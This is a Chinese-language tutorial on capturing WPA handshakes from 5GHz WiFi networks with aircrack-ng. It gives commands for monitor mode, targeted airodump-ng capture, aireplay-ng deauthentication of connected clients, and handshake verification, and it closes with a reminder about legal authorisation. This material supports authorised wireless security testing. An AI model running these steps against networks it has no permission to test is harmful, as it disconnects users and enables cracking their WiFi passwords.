使用 `aircrack-ng`扫描、获取握手包

使用 `aircrack-ng` 工具集来扫描 5GHz WiFi 网络的过程与扫描 2.4GHz 网络类似，但需要注意一些特定的配置和命令。以下是一个详细的步骤指南，帮助你在 5GHz 频段上扫描 WiFi 网络并捕获握手包。

 

### 前提条件

1. **操作系统**：通常在 Linux 系统上运行。

2. **硬件**：需要一个支持 5GHz 频段并能进入监听模式（Monitor Mode）的无线网卡。

3. **软件**：安装 `aircrack-ng` 工具集。可以在大多数 Linux 发行版中通过包管理器安装，如在 Ubuntu 上使用 `sudo apt-get install aircrack-ng`。

 

### 步骤

 

#### 1. 启动监听模式

首先，将无线网卡设置为监听模式，以便它可以捕获周围的无线信号。

```bash

airmon-ng start wlan0

```

这会创建一个新接口，通常是 `wlan0mon`，用于监听模式。

 

#### 2. 扫描 5GHz 网络

使用 `airodump-ng` 来扫描 5GHz 频段上的 WiFi 网络。5GHz 频段通常包括多个信道，范围从 36 到 165。你可以使用 `-f` 参数来指定扫描的频段。

```bash

airodump-ng --band a wlan0mon

```

这里的 `--band a` 参数指定扫描 5GHz 频段。

 

#### 3. 选择目标网络

观察输出，记下你想要捕获握手包的目标网络的 BSSID（基本服务集标识符）、信道（Channel）以及任何已连接的客户端 MAC 地址。

 

#### 4. 捕获握手包

一旦确定了目标网络，可以开始专门针对该网络捕获数据包。

```bash

airodump-ng --bssid [目标BSSID] -c [目标信道] -w [输出文件前缀] wlan0mon

```

这里，`--bssid` 参数指定目标网络的 BSSID，`-c` 参数指定目标网络所在的信道，`-w` 参数指定捕获文件的前缀名。

 

#### 5. 触发握手

如果长时间没有捕获到握手包，可能是因为没有客户端正在尝试连接到网络。可以通过向已连接的客户端发送断开连接（deauthentication）帧来促使握手发生。

```bash

aireplay-ng --deauth [次数] -a [目标BSSID] -c [客户端MAC地址] wlan0mon

```

`--deauth` 参数指定了发送断开连接帧的次数，`-a` 参数指定目标 AP 的 BSSID，`-c` 参数指定目标客户端的 MAC 地址。

 

#### 6. 验证握手包

一旦捕获到握手包，可以使用 `aircrack-ng` 来验证捕获文件中是否包含有效的握手包。

```bash

aircrack-ng [输出文件前缀]-01.cap

```

如果文件中包含有效的握手包，`aircrack-ng` 将显示相关信息。

 

### 注意事项

- **合法性**：确保你有权对目标网络进行这样的操作。未经授权的操作可能违法。

- **隐私**：尊重他人的隐私，不要非法获取或使用个人信息。

- **安全**：在公共或不安全的环境中使用这些工具时，注意保护自己的设备免受攻击。

- **硬件支持**：确保你的无线网卡支持 5GHz 频段并能进入监听模式。不是所有的无线网卡都支持这些功能。